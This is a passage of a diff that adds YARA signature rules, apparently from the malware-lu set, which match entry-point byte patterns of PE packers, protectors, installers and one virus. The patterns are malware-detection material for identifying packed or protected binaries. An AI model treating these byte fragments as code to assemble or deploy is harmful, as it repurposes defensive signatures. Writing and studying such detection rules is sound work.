+		$a0 = { A4 ?? ?? ?? 00 00 00 00 FF FF FF FF 3C ?? ?? ?? 94 ?? ?? ?? D8 ?? ?? ?? 00 00 00 00 FF FF FF FF B8 ?? ?? ?? D4 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 60 ?? ?? ?? 70 ?? ?? ?? 84 ?? ?? ?? 00 00 00 00 75 73 65 72 33 32 2E 64 6C 6C 00 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 }
+
+condition:
+		$a0
+}
+	
+	
+rule ShrinkWrapv14
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 58 60 8B E8 55 33 F6 68 48 01 ?? ?? E8 49 01 ?? ?? EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnknownbySMT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 83 ?? ?? 57 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01VOBProtectCD5Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 36 3E 26 8A C0 60 E8 00 00 00 00 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePack10Xbagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5B 8D 5B FA 6A 00 FF 93 ?? ?? 00 00 89 C5 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 8B 86 88 00 00 00 09 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThemidaWinLicenseV18XV19XOreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 05 89 48 01 61 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEjoinerAmok
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { A1 14 A1 40 00 C1 E0 02 A3 18 A1 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EmbedPEv124cyclotron
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 50 60 68 ?? ?? ?? ?? E8 CB FF 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv04xv05x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 ?? 8B FE 68 79 01 ?? ?? 59 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov301v305
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 0F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DingBoysPElockv007
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 23 35 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule mPack003DeltaAziz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 33 C0 89 45 F0 B8 A8 76 00 10 E8 67 C4 FF FF 33 C0 55 68 C2 78 00 10 64 FF 30 64 89 20 8D 55 F0 33 C0 E8 93 C8 FF FF 8B 45 F0 E8 87 CB FF FF A3 08 A5 00 10 33 C0 55 68 A5 78 00 10 64 FF 30 64 89 20 A1 08 A5 00 10 E8 FA C9 FF FF 83 F8 FF 75 0A E8 88 B2 FF FF E9 1B 01 00 00 C7 05 14 A5 00 10 32 00 00 00 A1 08 A5 00 10 8B 15 14 A5 00 10 E8 C9 C9 FF FF BA 14 A5 00 10 A1 08 A5 00 10 B9 04 00 00 00 E8 C5 C9 FF FF 83 3D 14 A5 00 10 32 77 0A E8 47 B2 FF FF E9 DA 00 00 00 A1 08 A5 00 10 8B 15 14 A5 00 10 E8 92 C9 FF FF BA 18 A5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SixtoFourv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 55 4C 50 83 ?? ?? FC BF ?? ?? BE ?? ?? B5 ?? 57 F3 A5 C3 33 ED }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoinerSmallbuild029GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 32 C4 8A C3 58 E8 DE FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThemidaWinLicenseV1XNoCompressionSecureEngineOreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule WinUpackv030betaByDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 }
+	$a1 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule Armadillov260b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 90 ?? ?? ?? 68 24 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 60 ?? ?? ?? 33 D2 8A D4 89 15 3C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov260b1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 50 ?? ?? ?? 68 74 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeLockerv10IonIce
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 60 8B 6C 24 20 81 ED 05 00 00 00 3E 8F 85 6C 00 00 00 3E 8F 85 68 00 00 00 3E 8F 85 64 00 00 00 3E 8F 85 60 00 00 00 3E 8F 85 5C 00 00 00 3E 8F 85 58 00 00 00 3E 8F 85 54 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV10betaap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8D 64 24 04 8B 6C 24 FC 8D B5 4C 02 00 00 8D 9D 13 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PellesC300400450EXEX86CRTDLL
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC ?? 53 56 57 89 65 E8 C7 45 FC ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 BE ?? ?? ?? ?? EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BeRoEXEPackerv100LZBRRBeRoFarbrausch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC B2 80 33 DB A4 B3 02 E8 ?? ?? ?? ?? 73 F6 33 C9 E8 ?? ?? ?? ?? 73 1C 33 C0 E8 ?? ?? ?? ?? 73 23 B3 02 41 B0 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov190a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 64 FF 68 10 F2 40 00 68 14 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4Modified
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule APatchGUIv11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 31 C0 E8 FF FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeSafeguardv10simonzh
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C0 5D EB 4E EB 47 DF 69 4E 58 DF 59 74 F3 EB 01 DF 75 EE 9A 59 9C 81 C1 E2 FF FF FF EB 01 DF 9D FF E1 E8 51 E8 EB FF FF FF DF 22 3F 9A C0 81 ED 19 18 40 00 EB 48 EB 47 DF 69 4E 58 DF 59 79 EE EB 01 DF 78 E9 DF 59 9C 81 C1 E5 FF FF FF 9D FF E1 EB 51 E8 EE }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01CDCopsIIAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 60 BD 90 90 90 90 8D 45 90 8D 5D 90 E8 00 00 00 00 8D 01 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeVIRUSIWormHybrisFEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 EB 16 A8 54 00 00 47 41 42 4C 4B 43 47 43 00 00 00 00 00 00 52 49 53 00 FC 68 4C 70 40 00 FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1322ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivateEXEProtector20SetiSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 89 ?? ?? 38 00 00 00 8B ?? 00 00 00 00 81 ?? ?? ?? ?? ?? 89 ?? 00 00 00 00 81 ?? 04 00 00 00 81 ?? 04 00 00 00 81 ?? 00 00 00 00 0F 85 D6 FF FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule NTkrnlSecureSuite01015DLLNTkrnlSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 8B 44 24 04 05 ?? ?? ?? ?? 50 E8 01 00 00 00 C3 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule UPXHiTv001DJSiba
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }
+
+condition:
+		$a0
+}
+	
+	
+rule Vpackerttui
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 89 C6 C7 45 E0 01 00 00 00 F7 03 00 00 FF FF 75 18 0F B7 03 50 8B 45 D8 50 FF 55 F8 89 07 8B C3 E8 ?? FE FF FF 8B D8 EB 13 53 8B 45 D8 50 FF 55 F8 89 07 8B C3 E8 ?? FE FF FF 8B D8 83 C7 04 FF 45 E0 4E 75 C4 8B F3 83 3E 00 75 88 8B 45 E4 8B 40 10 03 45 DC 8B 55 14 83 C2 20 89 02 68 00 80 00 00 6A 00 8B 45 D4 50 FF 55 EC 8B 55 DC 8B 42 3C 03 45 DC 83 C0 04 8B D8 83 C3 14 8D 45 E0 50 6A 40 68 00 10 00 00 52 FF 55 E8 8D 43 60 }
+
+condition:
+		$a0
+}
+	
+	
+rule IProtect10FxlibdllmodebyFuXdas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 33 2E 46 55 58 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 46 78 4C 69 62 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 60 E8 00 00 00 00 5D 81 ED 71 10 40 00 FF 74 24 20 E8 40 00 00 00 0B C0 74 2F 89 85 63 10 40 00 8D 85 3C 10 40 00 50 FF B5 63 10 40 00 E8 92 00 00 00 0B C0 74 13 89 85 5F 10 40 00 8D 85 49 10 40 00 50 FF 95 5F 10 40 00 8B 85 67 10 40 00 89 44 24 1C 61 FF E0 8B 7C 24 04 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 53 10 40 00 89 20 89 68 04 8D 9D 0A 11 40 00 89 58 08 64 89 25 00 00 00 00 81 E7 00 00 FF FF 66 81 3F 4D 5A 75 0F 8B F7 03 76 3C 81 3E 50 45 00 00 75 02 EB 17 81 EF 00 00 01 00 81 FF 00 00 00 70 73 07 BF 00 00 F7 BF EB 02 EB D3 97 64 8F 05 00 00 00 00 83 C4 04 C2 04 00 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 53 10 40 00 89 20 89 68 04 8D 9D 0A 11 40 00 89 58 08 64 89 25 00 00 00 00 8B 74 24 0C 66 81 3E 4D 5A 74 05 E9 8A 00 00 00 03 76 3C 81 3E 50 45 00 00 74 02 EB 7D 8B 7C 24 10 B9 96 00 00 00 32 C0 F2 AE 8B CF 2B 4C 24 10 8B 56 78 03 54 24 0C 8B 5A 20 03 5C 24 0C 33 C0 8B 3B 03 7C 24 0C 8B 74 24 10 51 F3 A6 75 05 83 C4 04 EB 0A 59 83 C3 04 40 3B 42 18 75 E2 3B 42 18 75 02 EB 35 8B 72 24 03 74 24 0C 52 BB 02 00 00 00 33 D2 F7 E3 5A 03 C6 33 C9 66 8B 08 8B 7A 1C 33 D2 BB 04 00 00 00 8B C1 F7 E3 03 44 24 0C 03 C7 8B 00 03 44 24 0C EB 02 33 C0 64 8F 05 00 00 00 00 83 C4 04 C2 08 00 E8 FA FD FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02DxPack10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 8B FD 81 ED 90 90 90 90 2B B9 00 00 00 00 81 EF 90 90 90 90 83 BD 90 90 90 90 90 0F 84 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SecureEXE30ZipWorx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 B8 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorv12CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 45 78 50 72 2D 76 2E 31 2E 32 2E }
+	$a1 = { 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E B8 ?? ?? ?? ?? 2B 05 84 ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 16 A1 ?? ?? ?? ?? 03 05 80 ?? ?? ?? 89 85 54 FE FF FF E9 ?? 07 00 00 C7 05 ?? ?? ?? ?? 01 00 00 00 68 04 }
+	$a2 = { 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E B8 ?? ?? ?? ?? 2B 05 84 ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 16 A1 ?? ?? ?? ?? 03 05 80 ?? ?? ?? 89 85 54 FE FF FF E9 ?? 07 00 00 C7 05 ?? ?? ?? ?? 01 00 00 00 68 04 01 00 00 8D 85 F0 FE FF FF 50 6A 00 FF 15 }
+
+condition:
+		$a0 or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule NullsoftPIMPInstallSystemv13x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC ?? ?? 00 00 56 57 6A ?? BE ?? ?? ?? ?? 59 8D BD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Enigmaprotector110111VladimirSukhov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 }
+	$a1 = { 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 C0 C3 83 C0 08 EB 02 FF 15 89 C4 61 EB 2E EA EB 2B 83 04 24 03 EB 01 00 31 C0 EB 01 85 64 FF 30 EB 01 83 64 89 20 EB 02 CD 20 89 00 9A 64 8F 05 00 00 00 00 EB 02 C1 90 58 61 EB 01 3E EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 01 E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 05 F6 01 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 B9 3D 1A }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule PECompactv140b5v140b6
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 8A 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxExplosion1000
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 1E 06 50 81 ?? ?? ?? 56 FC B8 21 35 CD 21 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 26 ?? ?? ?? ?? ?? ?? 74 ?? 8C D8 48 8E D8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKZIPSFXv11198990
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 2E 8C 0E ?? ?? A1 ?? ?? 8C CB 81 C3 ?? ?? 3B C3 72 ?? 2D ?? ?? 2D ?? ?? FA BC ?? ?? 8E D0 FB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEBundlev20b5v23
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 01 AD ?? ?? ?? ?? 01 AD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PUNiSHERV15DemoFEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 83 A4 BC CE 60 EB 04 80 BC 04 11 E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HACKSTOPv110v111
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 30 CD 21 86 E0 3D ?? ?? 73 ?? B4 2F CD 21 B0 ?? B4 4C CD 21 50 B8 ?? ?? 58 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1336ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 }
+
+condition:
+		$a0
+}
+	
+	
+rule DualseXeEncryptor10bDual
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 00 05 00 00 E8 00 00 00 00 5D 81 ED 0E 00 00 00 8D 85 3A 04 00 00 89 28 33 FF 8D 85 80 03 00 00 8D 8D 3A 04 00 00 2B C8 8B 9D 8A 04 00 00 E8 24 02 00 00 8D 9D 58 03 00 00 8D B5 7F 03 00 00 46 80 3E 00 74 24 56 FF 95 58 05 00 00 46 80 3E 00 75 FA 46 80 3E 00 74 E7 50 56 50 FF 95 5C 05 00 00 89 03 58 83 C3 04 EB E3 8D 85 69 02 00 00 FF D0 8D 85 56 04 00 00 50 68 1F 00 02 00 6A 00 8D 85 7A 04 00 00 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MarjinZEXEScramblerSEbyMarjinZ
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 A3 02 00 00 E9 35 FD FF FF FF 25 C8 20 00 10 6A 14 68 C0 21 00 10 E8 E4 01 00 00 FF 35 7C 33 00 10 8B 35 8C 20 00 10 FF D6 59 89 45 E4 83 F8 FF 75 0C FF 75 08 FF 15 88 20 00 10 59 EB 61 6A 08 E8 02 03 00 00 59 83 65 FC 00 FF 35 7C 33 00 10 FF D6 89 45 E4 FF 35 78 33 00 10 FF D6 89 45 E0 8D 45 E0 50 8D 45 E4 50 FF 75 08 E8 D1 02 00 00 89 45 DC FF 75 E4 8B 35 74 20 00 10 FF D6 A3 7C 33 00 10 FF 75 E0 FF D6 83 C4 1C A3 78 33 00 10 C7 45 FC FE FF FF FF E8 09 00 00 00 8B 45 DC E8 A0 01 00 00 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule nPack111502006BetaNEOx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D ?? ?? ?? ?? ?? 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 5E 00 00 00 E8 E0 01 00 00 E8 EC 06 00 00 E8 F7 05 00 00 A1 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 01 05 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? C3 C3 56 57 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? 57 FF D6 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 5F A3 ?? ?? ?? ?? 5E C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DingBoysPElockPhantasmv15b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 55 57 56 52 51 53 9C FA E8 00 00 00 00 5D 81 ED 5B 53 40 00 B0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ShellModify01pll621
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 98 66 41 00 68 3C 3D 41 00 64 A1 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01MacromediaFlashProjector60Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 83 EC 44 56 FF 15 24 81 49 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Packman0001Bubbasoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0F 85 ?? FF FF FF 8D B3 ?? ?? ?? ?? EB 3D 8B 46 0C 03 C3 50 FF 55 00 56 8B 36 0B F6 75 02 8B F7 03 F3 03 FB EB 1B D1 C1 D1 E9 73 05 0F B7 C9 EB 05 03 CB 8D 49 02 50 51 50 FF 55 04 AB 58 83 C6 04 8B 0E 85 C9 75 DF 5E 83 C6 14 8B 7E 10 85 FF 75 BC 8D 8B 00 }
+
